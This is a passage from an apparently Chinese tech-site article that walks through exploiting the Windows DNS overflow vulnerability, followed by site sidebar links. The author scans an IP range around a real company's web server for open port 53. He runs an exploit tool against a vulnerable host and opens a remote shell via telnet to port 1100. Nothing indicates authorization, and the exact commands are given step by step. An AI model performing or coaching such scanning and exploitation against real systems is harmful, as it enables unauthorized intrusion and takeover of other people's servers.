二、DNS溢出测试
1.缘由:
DNS溢出漏洞是去年微软的一个高危漏洞,攻击者通过该漏洞可以溢出获得一个shell,进而控制这台服务器。一年过去了,还有存在该漏洞的服务器吗?
2.测试:
笔者以某企业网站的IP为中心进行测试。
第一步:先看看该网站Web服务器的IP地址,打开命令提示符,敲入如下命令:ping www.*.com,得知ip地址为:202.2##.*.196。
第二步:以202.2##.*.196为中心确定一个IP段,在命令行下用S扫描器扫描开放了53端口(DNS端口)的服务器。对扫描结果中的IP逐个进行溢出测试,经过一次次的测试找到了一个存在DNS溢出的IP。在命令行下敲入如下命令:dns -s 202.2##.*.196,显示如图4。(图4)
说明:服务器采用的是windows 2000,在1052端口存在DNS溢出漏洞。
第三步:继续在命令行下,敲入如下命令:dns -t2000all 202.2##.*.196 1052 显示如图5。(图5)
第四步:重新打开另外一个命令提示符,敲入命令:telnet 202.2##.*.196 1100,速度很快,返回一个shell,溢出成功。在telnet界面中敲入如下命令:net query,显示如图6,看来管理员不在线。(图6)
更多内容请看路由安全配置专题、FTP服务器、双核服务器技术专题,或进入讨论组讨论。
相关图文阅读
频道图文推荐
健 康 咨 询
时 尚 咨 询
相关专题
- eMule电驴“代理服务器”的作用讲解 (97次浏览)
- 妙招可循,让IIS管理更加高效 (81次浏览)
- FreeBSD 6.2快速架设网站服务器教程 (50次浏览)
- 通过ISA2006防火墙发布SSL的OWA (47次浏览)
- 轻量级Web服务器 (41次浏览)
- 备份和还原Exchange 2007邮箱存储组 (41次浏览)
- 玩转Exchange 2007传输和路由功能 (41次浏览)
- 统计分析apache服务器日志 (34次浏览)
- IIS排错指南及错误代码大全 (34次浏览)
- 整合apache tomcat服务器 (29次浏览)
